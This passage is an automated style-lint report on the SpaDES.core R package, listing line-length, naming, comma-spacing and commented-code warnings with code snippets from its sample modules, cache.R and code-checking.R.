**Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:413:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L413) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #   makes soft copy of all objects, i.e., they have the identical objects, which are pointers only\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:441:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L441) *style:* **Lines should not be more than 100 characters.**\n```r\n​        list2env(mget(lsObjectEnv[lsObjectEnv %in% createOutputs | lsObjectEnv %in% expectsInputs], envir = object@.envir), envir = object2@.envir)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:451:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L451) *style:* **Commented code should be removed.**\n```r\n​          #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:455:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L455) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # This is for objects that are not in the return environment yet because they are unrelated to the\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:468:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L468) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:472:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L472) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:473:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L473) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:474:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L474) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:507:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L507) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:530:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L530) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:622:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L622) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:649:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L649) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:657:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/cache.R#L657) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            